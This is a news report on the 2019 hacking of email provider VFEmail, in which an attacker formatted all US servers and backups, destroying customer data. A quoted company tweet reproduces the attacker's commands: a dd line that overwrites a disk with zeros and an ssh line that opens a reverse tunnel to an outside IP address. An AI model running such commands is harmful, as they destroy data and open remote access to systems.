Hackers wipe out US servers from email provider VFEmail
Image: ZDNet
The hackers breached the servers of the email provider VFEmail.net and erased data from all of its US servers, destroying all US customer data.
The attack took place yesterday, February 11, and was detected after the unannounced outage of the company’s website and webmail client.
“At the moment, the attacker has formatted all the drives on each server,” the company said yesterday. “Every VM is lost. Every file server is lost, every backup server is lost.”
“It was more than a multi-password via an SSH exploit, and there was no ransom. Just attack and destroy,” VFEmail said.
I caught the criminal formatting the backup server:
dd if = / dev / zero of = / dev / da0 bs = 4194304 seek = 1024 count = 399559
via: ssh -v -oStrictHostKeyChecking = no -oLogLevel = error -oUserKnownHostsFile = / dev / null aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N– VFEmail.net (@VFEmail) February 11, 2019
Company staff are now in the process of retrieving user emails, but as it stands, all US customer data appears to have been deleted for good and entered in / dev / null.
The company’s website is now back online, but its secondary domains are still down, such as chewiemail.com, clovermail.net, mail-on.us, manlymail.net, metadatamitigator.com, offensivelytolerant.com, openmail.cc, powdermail .com and dentandmail.com.
US users accessing their respective VFEmail accounts will be greeted with empty inboxes. Users who can’t access their inboxes are prompted to send themselves an email, according to an explanation on the company’s website.
There is also no spam filter in place, but that will likely be the last thing on the minds of VFEmail users, as many have likely lost sensitive information that they had saved in their inboxes. .
A spokesperson for VFEmail was not available for comment at the time of posting.
Rarely do hackers take steps to erase an entire business’s data. Most attacks typically result in hackers using compromised servers for other attacks (such as running botnets or hosting malware), or hackers demanding ransom from hacked victims.
The biggest ransom note ever paid known to this day is by Nayana, a South Korean web hosting company that distributed $ 1 million in Bitcoin after hackers entered its network and executed Linux-based Erebus ransomware that encrypted data over thousands client servers.
As of November 2015, VFEmail was one of several online email providers targeted by Armada Collective, a hacker group demanding ransom payments from victimized businesses to stop ongoing DDoS attacks. [1, 2].
In June 2014, the infrastructure-as-a-service provider code spaces were forced to close after hackers also breached its servers and wiped out the servers.
